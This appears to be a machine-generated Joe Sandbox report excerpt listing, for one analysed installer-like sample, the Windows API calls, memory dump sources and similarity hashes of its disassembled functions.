                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Calibri
                                                                      • API String ID: 3808545654-1409258342
                                                                      • Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                      • Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
                                                                      • Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
                                                                      • Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                      • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                      • String ID: 9
                                                                      • API String ID: 3029736425-2366072709
                                                                      • Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                      • Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
                                                                      • Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
                                                                      • Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
                                                                      APIs
                                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                      • lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateValuelstrlen
                                                                      • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
                                                                      • API String ID: 1356686001-3814320704
                                                                      • Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                      • Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
                                                                      • Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
                                                                      • Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B76
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B9B
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                      • Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
                                                                      • Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
                                                                      • Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                      • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                                      • Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
                                                                      • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                                      • wsprintfW.USER32 ref: 00404878
                                                                      • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                      • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                                      • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                      • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                      • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                                      • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                      • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID: OC
                                                                      • API String ID: 334405425-1597561874
                                                                      • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                      • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                                      • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                                      • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004057B4
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 004057BE
                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3936084776
                                                                      • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                      • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                                      • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                      • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                                      • GetTickCount.KERNEL32 ref: 00402CCC
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
